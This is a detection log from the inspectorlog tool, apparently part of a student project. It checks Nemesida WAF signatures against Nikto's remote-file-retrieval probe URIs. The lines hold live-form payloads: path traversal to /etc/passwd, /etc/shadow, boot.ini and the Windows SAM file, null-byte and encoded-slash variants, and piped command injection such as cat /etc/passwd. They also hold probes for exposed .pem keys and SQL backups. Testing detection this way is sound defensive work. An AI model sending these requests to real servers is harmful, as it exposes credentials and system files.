# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l remote_file_retrieval.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/conf_personalizada/web_dinamica/owasp/opensource/nikto/remote_file_retrieval.clean
Packet [4]	Uri [/web/P0fBZVYJ.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [5]	Uri [/web/P0fBZVYJ.bat]	Nattacks [1]	Signatures	[300001562]
Packet [6]	Uri [/web/P0fBZVYJ.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [10]	Uri [/web/P0fBZVYJ.dat]	Nattacks [1]	Signatures	[300001562]
Packet [19]	Uri [/web/P0fBZVYJ.exe]	Nattacks [1]	Signatures	[300001562]
Packet [22]	Uri [/web/P0fBZVYJ.ini]	Nattacks [1]	Signatures	[300001517]
Packet [59]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [60]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [61]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [62]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [63]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/HASH(0x55b0d4c55ed0)%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [64]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [80]	Uri [/web/192.war]	Nattacks [1]	Signatures	[300001516]
Packet [81]	Uri [/web/192.war]	Nattacks [1]	Signatures	[300001516]
Packet [86]	Uri [/web/backup.sql]	Nattacks [1]	Signatures	[300001526]
Packet [87]	Uri [/web/backup.sql]	Nattacks [1]	Signatures	[300001526]
Packet [90]	Uri [/web/backup.zip]	Nattacks [1]	Signatures	[300002752]
Packet [91]	Uri [/web/backup.zip]	Nattacks [1]	Signatures	[300002752]
Packet [92]	Uri [/web/1.war]	Nattacks [1]	Signatures	[300001516]
Packet [93]	Uri [/web/1.war]	Nattacks [1]	Signatures	[300001516]
Packet [98]	Uri [/web/192.168.1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [99]	Uri [/web/192.168.1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [106]	Uri [/web/168.war]	Nattacks [1]	Signatures	[300001516]
Packet [107]	Uri [/web/168.war]	Nattacks [1]	Signatures	[300001516]
Packet [110]	Uri [/web/site.sql]	Nattacks [1]	Signatures	[300001526]
Packet [111]	Uri [/web/site.sql]	Nattacks [1]	Signatures	[300001526]
Packet [118]	Uri [/web/backup.pem]	Nattacks [1]	Signatures	[300001925]
Packet [119]	Uri [/web/backup.pem]	Nattacks [1]	Signatures	[300001925]
Packet [126]	Uri [/web/192.168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [127]	Uri [/web/192.168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [142]	Uri [/web/101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [143]	Uri [/web/101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [160]	Uri [/web/1921681.war]	Nattacks [1]	Signatures	[300001516]
Packet [161]	Uri [/web/1921681.war]	Nattacks [1]	Signatures	[300001516]
Packet [164]	Uri [/web/192.168.1.war]	Nattacks [1]	Signatures	[300001516]
Packet [165]	Uri [/web/192.168.1.war]	Nattacks [1]	Signatures	[300001516]
Packet [172]	Uri [/web/192.168.1.101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [173]	Uri [/web/192.168.1.101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [174]	Uri [/web/168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [175]	Uri [/web/168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [182]	Uri [/web/192.168.1.101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [183]	Uri [/web/192.168.1.101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [192]	Uri [/web/192.168.1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [193]	Uri [/web/192.168.1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [206]	Uri [/web/192.168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [207]	Uri [/web/192.168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [208]	Uri [/web/192.sql]	Nattacks [1]	Signatures	[300001526]
Packet [209]	Uri [/web/192.sql]	Nattacks [1]	Signatures	[300001526]
Packet [224]	Uri [/web/1921681101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [225]	Uri [/web/1921681101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [230]	Uri [/web/101.war]	Nattacks [1]	Signatures	[300001516]
Packet [231]	Uri [/web/101.war]	Nattacks [1]	Signatures	[300001516]
Packet [236]	Uri [/web/192_168_1_101.war]	Nattacks [1]	Signatures	[300001516]
Packet [237]	Uri [/web/192_168_1_101.war]	Nattacks [1]	Signatures	[300001516]
Packet [254]	Uri [/web/backup.war]	Nattacks [1]	Signatures	[300001516]
Packet [255]	Uri [/web/backup.war]	Nattacks [1]	Signatures	[300001516]
Packet [264]	Uri [/web/168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [265]	Uri [/web/168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [270]	Uri [/web/site.pem]	Nattacks [1]	Signatures	[300001925]
Packet [271]	Uri [/web/site.pem]	Nattacks [1]	Signatures	[300001925]
Packet [276]	Uri [/web/192.pem]	Nattacks [1]	Signatures	[300001925]
Packet [277]	Uri [/web/192.pem]	Nattacks [1]	Signatures	[300001925]
Packet [282]	Uri [/web/192.168.1.101.war]	Nattacks [1]	Signatures	[300001516]
Packet [283]	Uri [/web/192.168.1.101.war]	Nattacks [1]	Signatures	[300001516]
Packet [300]	Uri [/web/1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [301]	Uri [/web/1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [304]	Uri [/web/192.168.war]	Nattacks [1]	Signatures	[300001516]
Packet [305]	Uri [/web/192.168.war]	Nattacks [1]	Signatures	[300001516]
Packet [312]	Uri [/web/192_168_1_101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [313]	Uri [/web/192_168_1_101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [316]	Uri [/web/1921681.sql]	Nattacks [1]	Signatures	[300001526]
Packet [317]	Uri [/web/1921681.sql]	Nattacks [1]	Signatures	[300001526]
Packet [320]	Uri [/web/192_168_1_101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [321]	Uri [/web/192_168_1_101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [322]	Uri [/web/1921681101.war]	Nattacks [1]	Signatures	[300001516]
Packet [323]	Uri [/web/1921681101.war]	Nattacks [1]	Signatures	[300001516]
Packet [334]	Uri [/web/192168.war]	Nattacks [1]	Signatures	[300001516]
Packet [335]	Uri [/web/192168.war]	Nattacks [1]	Signatures	[300001516]
Packet [348]	Uri [/web/192168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [349]	Uri [/web/192168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [352]	Uri [/web/backup.tar]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [353]	Uri [/web/backup.tar]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [358]	Uri [/web/1921681.pem]	Nattacks [1]	Signatures	[300001925]
Packet [359]	Uri [/web/1921681.pem]	Nattacks [1]	Signatures	[300001925]
Packet [360]	Uri [/web/1921681101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [361]	Uri [/web/1921681101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [362]	Uri [/web/1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [363]	Uri [/web/1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [384]	Uri [/web/192168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [385]	Uri [/web/192168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [398]	Uri [/web/site.war]	Nattacks [1]	Signatures	[300001516]
Packet [399]	Uri [/web/site.war]	Nattacks [1]	Signatures	[300001516]
Packet [400]	Uri [/web/backup.tar.gz]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [401]	Uri [/web/backup.tar.gz]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [408]	Uri [/web/101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [409]	Uri [/web/101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [426]	Uri [/web/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [427]	Uri [/web/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [428]	Uri [/web/index.pl]	Nattacks [1]	Signatures	[300001513]
Packet [436]	Uri [/web/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [447]	Uri [/web/admin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [448]	Uri [/web/administrator.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [449]	Uri [/web/authLogin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [451]	Uri [/web/banner.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [452]	Uri [/web/book.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [453]	Uri [/web/cgiinfo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [454]	Uri [/web/cgitest.py]	Nattacks [1]	Signatures	[300001513]
Packet [456]	Uri [/web/contact.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [457]	Uri [/web/count.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [458]	Uri [/web/defaultwebpage.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [459]	Uri [/web/download.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [460]	Uri [/web/entropysearch.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [461]	Uri [/web/env.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [462]	Uri [/web/environment.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [464]	Uri [/web/formmail.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [465]	Uri [/web/FormMail-clone.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [466]	Uri [/web/guestbook.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [467]	Uri [/web/helpdesk.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [468]	Uri [/web/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [470]	Uri [/web/index.pl]	Nattacks [1]	Signatures	[300001513]
Packet [471]	Uri [/web/info.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [473]	Uri [/web/loadpage.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [474]	Uri [/web/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [476]	Uri [/web/login.pl]	Nattacks [1]	Signatures	[300001513]
Packet [477]	Uri [/web/pathtest.pl]	Nattacks [1]	Signatures	[300001513]
Packet [482]	Uri [/web/php.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [484]	Uri [/web/printenv]	Nattacks [1]	Signatures	[300001826]
Packet [485]	Uri [/web/restore_config.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [486]	Uri [/web/ruby.rb]	Nattacks [1]	Signatures	[300001505]
Packet [488]	Uri [/web/search.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [491]	Uri [/web/sysinfo.pl]	Nattacks [1]	Signatures	[300001513]
Packet [494]	Uri [/web/test.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [497]	Uri [/web/test_cgi.pl]	Nattacks [1]	Signatures	[300001513]
Packet [498]	Uri [/web/test-cgi.pl]	Nattacks [1]	Signatures	[300001513]
Packet [499]	Uri [/web/test.py]	Nattacks [1]	Signatures	[300001513]
Packet [501]	Uri [/web/tmUnblock.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [502]	Uri [/web/uname.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [503]	Uri [/web/viewcvs.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [505]	Uri [/web/whois.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [507]	Uri [/web/../../../../../../../../../../../../etc/shadow]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [511]	Uri [/web/cfappman/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [512]	Uri [/web/cfdocs/examples/cvbeans/beaninfo.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [513]	Uri [/web/cfdocs/examples/parks/detail.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [525]	Uri [/web/[SecCheck]/..%2f../ext.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [526]	Uri [/web/[SecCheck]/..%255c..%255c../ext.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [527]	Uri [/web/[SecCheck]/..%252f..%252f../ext.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [528]	Uri [/web/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini]	Nattacks [1]	Signatures	[300001516]
Packet [529]	Uri [/web/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini]	Nattacks [1]	Signatures	[300001516]
Packet [530]	Uri [/web/.nsf/../winnt/win.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [531]	Uri [/web/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [532]	Uri [/web/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [533]	Uri [/web/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [534]	Uri [/web/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [537]	Uri [/web/................../config.sys]	Nattacks [1]	Signatures	[300000067]
Packet [538]	Uri [/web/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini]	Nattacks [1]	Signatures	[300001516]
Packet [539]	Uri [/web/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini]	Nattacks [1]	Signatures	[300001516]
Packet [540]	Uri [/web/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini]	Nattacks [1]	Signatures	[300001516]
Packet [541]	Uri [/web/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [542]	Uri [/web/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [543]	Uri [/web/php/php.exe?c:\winnt\boot.ini]	Nattacks [1]	Signatures	[300001562]
Packet [545]	Uri [/web/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini]	Nattacks [1]	Signatures	[300001517]
Packet [546]	Uri [/web/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini]	Nattacks [1]	Signatures	[300001562]
Packet [547]	Uri [/web/wx/s.dll?d=/boot.ini]	Nattacks [1]	Signatures	[300001562]
Packet [548]	Uri [/web/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [549]	Uri [/web/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [550]	Uri [/web/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\]	Nattacks [3]	Signatures	[300000057]	[300000066]	[300001562]
Packet [551]	Uri [/web/php/php.exe?c:\boot.ini]	Nattacks [1]	Signatures	[300001562]
Packet [552]	Uri [/web/../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [553]	Uri [/web/../../../../winnt/repair/sam._]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [554]	Uri [/web/..\\..\\..\\..\\..\\..\\..\\boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000066]	[300001517]
Packet [555]	Uri [/web///etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [557]	Uri [/web////./../.../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [558]	Uri [/web/.cobalt/sysManage/../admin/.htaccess]	Nattacks [2]	Signatures	[300000067]	[300001847]
Packet [559]	Uri [/web/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [560]	Uri [/web/autohtml.php?op=modload&mainfile=x&name=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [561]	Uri [/web/atomicboard/index.php?location=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [562]	Uri [/web/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [563]	Uri [/web/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [564]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [565]	Uri [/web/cms/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [566]	Uri [/web/site/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [567]	Uri [/web/typo/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [568]	Uri [/web/typo3/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [569]	Uri [/web/DomainFiles/*//../../../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000039]	[300000040]	[300000057]	[300000067]	[300001559]
Packet [570]	Uri [/web/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini]	Nattacks [1]	Signatures	[300001516]
Packet [571]	Uri [/web/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [574]	Uri [/web/index.php?download=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [575]	Uri [/web/index.php?|=../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [576]	Uri [/web/index.php?page=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [577]	Uri [/web/index.php?page=../../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [578]	Uri [/web/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [579]	Uri [/web/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]	[300001559]
Packet [580]	Uri [/web/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]
Packet [581]	Uri [/web/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [582]	Uri [/web/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001513]	[300001559]
Packet [583]	Uri [/web/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001513]
Packet [584]	Uri [/web/phprocketaddin/?page=../../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [585]	Uri [/web/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [586]	Uri [/web/phpwebfilemgr/index.php?f=../../../../../../../../../etc]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [587]	Uri [/web/phptonuke.php?filnavn=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [588]	Uri [/web/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]	[300001562]
Packet [589]	Uri [/web/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00]	Nattacks [6]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001513]	[300001559]
Packet [590]	Uri [/web/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [591]	Uri [/web/viewpage.php?file=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [592]	Uri [/web/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html]	Nattacks [6]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001513]	[300001559]
Packet [593]	Uri [/web/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [594]	Uri [/web/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [595]	Uri [/web/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [596]	Uri [/web/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [597]	Uri [/web/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|]	Nattacks [7]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]	[300001359]	[300001513]	[300001559]
Packet [598]	Uri [/web/page.cgi?../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001513]	[300001559]
Packet [599]	Uri [/web/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001513]	[300001559]
Packet [600]	Uri [/web/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [601]	Uri [/web/search?NS-query-pat=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [602]	Uri [/web/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [604]	Uri [/web/../webserver.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [607]	Uri [/web/../config.dat]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [608]	Uri [/web/iissamples/sdk/asp/docs/Winmsdp.exe]	Nattacks [1]	Signatures	[300001562]
Packet [609]	Uri [/web/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [1]	Signatures	[300001562]
Packet [616]	Uri [/web/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [617]	Uri [/web/data/owncloud.log]	Nattacks [1]	Signatures	[300001518]
Packet [618]	Uri [/web/cloud/data/owncloud.log]	Nattacks [1]	Signatures	[300001518]
Packet [619]	Uri [/web/owncloud/data/owncloud.log]	Nattacks [1]	Signatures	[300001518]
Packet [620]	Uri [/web/ownCloud/data/owncloud.log]	Nattacks [1]	Signatures	[300001518]
Packet [621]	Uri [/web/OwnCloud/data/owncloud.log]	Nattacks [1]	Signatures	[300001518]
Packet [627]	Uri [/web/data/owncloud.db]	Nattacks [1]	Signatures	[300001526]
Packet [628]	Uri [/web/cloud/data/owncloud.db]	Nattacks [1]	Signatures	[300001526]
Packet [629]	Uri [/web/owncloud/data/owncloud.db]	Nattacks [1]	Signatures	[300001526]
Packet [630]	Uri [/web/ownCloud/data/owncloud.db]	Nattacks [1]	Signatures	[300001526]
Packet [631]	Uri [/web/OwnCloud/data/owncloud.db]	Nattacks [1]	Signatures	[300001526]
Packet [632]	Uri [/web/data/owncloud.log]	Nattacks [1]	Signatures	[300001518]
Packet [634]	Uri [/web/data/owncloud.db]	Nattacks [1]	Signatures	[300001526]
Packet [635]	Uri [/web/cloud/data/owncloud.log]	Nattacks [1]	Signatures	[300001518]
Packet [637]	Uri [/web/cloud/data/owncloud.db]	Nattacks [1]	Signatures	[300001526]
Packet [638]	Uri [/web/owncloud/data/owncloud.log]	Nattacks [1]	Signatures	[300001518]
Packet [640]	Uri [/web/owncloud/data/owncloud.db]	Nattacks [1]	Signatures	[300001526]
Packet [641]	Uri [/web/ownCloud/data/owncloud.log]	Nattacks [1]	Signatures	[300001518]
Packet [643]	Uri [/web/ownCloud/data/owncloud.db]	Nattacks [1]	Signatures	[300001526]
Packet [644]	Uri [/web/OwnCloud/data/owncloud.log]	Nattacks [1]	Signatures	[300001518]
Packet [646]	Uri [/web/OwnCloud/data/owncloud.db]	Nattacks [1]	Signatures	[300001526]
Packet [657]	Uri [/web/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [658]	Uri [/web/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [659]	Uri [/web/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [660]	Uri [/web/magento/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [661]	Uri [/web/magento/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [662]	Uri [/web/shop/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [663]	Uri [/web/shop/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
